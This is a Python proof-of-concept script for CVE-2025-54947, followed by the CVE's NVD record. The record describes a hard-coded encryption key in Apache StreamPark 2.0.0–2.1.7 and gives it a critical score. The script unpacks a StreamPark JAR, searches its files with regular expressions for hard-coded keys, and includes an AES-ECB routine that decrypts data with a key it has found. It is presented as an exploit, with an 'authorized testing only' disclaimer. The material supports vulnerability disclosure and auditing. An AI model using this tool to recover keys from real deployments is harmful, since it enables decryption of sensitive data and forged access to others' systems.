CVE-2025-54947

# CVE-2025-54947 PoC - Hardcoded Encryption Key Extraction # This PoC demonstrates extracting hardcoded keys from Apache StreamPark import zipfile import os import re def extract_jar(jar_path, extract_dir): """Extract JAR file contents""" with zipfile.ZipFile(jar_path, 'r') as zip_ref: zip_ref.extractall(extract_dir) def search_hardcoded_keys(directory): """Search for hardcoded encryption keys in decompiled files""" key_patterns = [ r'(?i)(?:AES|DES|RSA|ENCRYPT).{0,20}?=\s*["\']([a-zA-Z0-9+/=]{16,})["\']', r'(?i)KEY\s*=\s*["\']([a-zA-Z0-9]{16,64})["\']', r'(?i)(?:SECRET|PRIVATE).{0,20}?=\s*["\']([a-zA-Z0-9+/=]{16,})["\']', r'Base64\.decode\(["\']([a-zA-Z0-9+/=]{20,})["\']' ] findings = [] for root, dirs, files in os.walk(directory): for file in files: if file.endswith(('.java', '.class', '.properties', '.yml')): filepath = os.path.join(root, file) try: with open(filepath, 'r', encoding='utf-8', errors='ignore') as f: content = f.read() for pattern in key_patterns: matches = re.findall(pattern, content) for match in matches: findings.append({ 'file': filepath, 'key': match, 'pattern': pattern }) except Exception as e: print(f"Error reading {filepath}: {e}") return findings def decrypt_with_key(encrypted_data, key): """Decrypt data using extracted key""" # Implementation depends on the encryption algorithm used # Example using AES-ECB mode (commonly found in hardcoded key scenarios) from Crypto.Cipher import AES from Crypto.Util.Padding import unpad try: cipher = AES.new(key.encode('utf-8'), AES.MODE_ECB) decrypted = unpad(cipher.decrypt(encrypted_data), AES.block_size) return decrypted.decode('utf-8') except Exception as e: return f"Decryption failed: {e}" # Main execution if __name__ == "__main__": streampark_jar = "streampark-common.jar" extract_dir = "extracted" print("CVE-2025-54947 PoC - Extracting hardcoded keys from Apache StreamPark") print("=" * 70) # Extract JAR if os.path.exists(streampark_jar): extract_jar(streampark_jar, extract_dir) print(f"[+] Extracted {streampark_jar} to {extract_dir}") # Search for keys findings = search_hardcoded_keys(extract_dir) if findings: print(f"\n[+] Found {len(findings)} potential hardcoded keys:") for i, finding in enumerate(findings, 1): print(f"\n[{i}] File: {finding['file']}") print(f" Key: {finding['key']}") else: print("[-] No hardcoded keys found") print("\n[!] Note: This PoC is for authorized security testing only")

{"cve": {"id": "CVE-2025-54947", "sourceIdentifier": "[email protected]", "published": "2025-12-12T15:15:53.577", "lastModified": "2025-12-15T17:20:46.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access.\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.1.7", "matchCriteriaId": "18BD3C9F-61F6-4D68-B0E7-333A94F827ED"}]}]}], "references": [{"url": "https://lists.apache.org/thread/kdntmzyzrco75x9q6mc6s8lty1fxmog1", "source": "[email protected]", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/12/3", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}]}}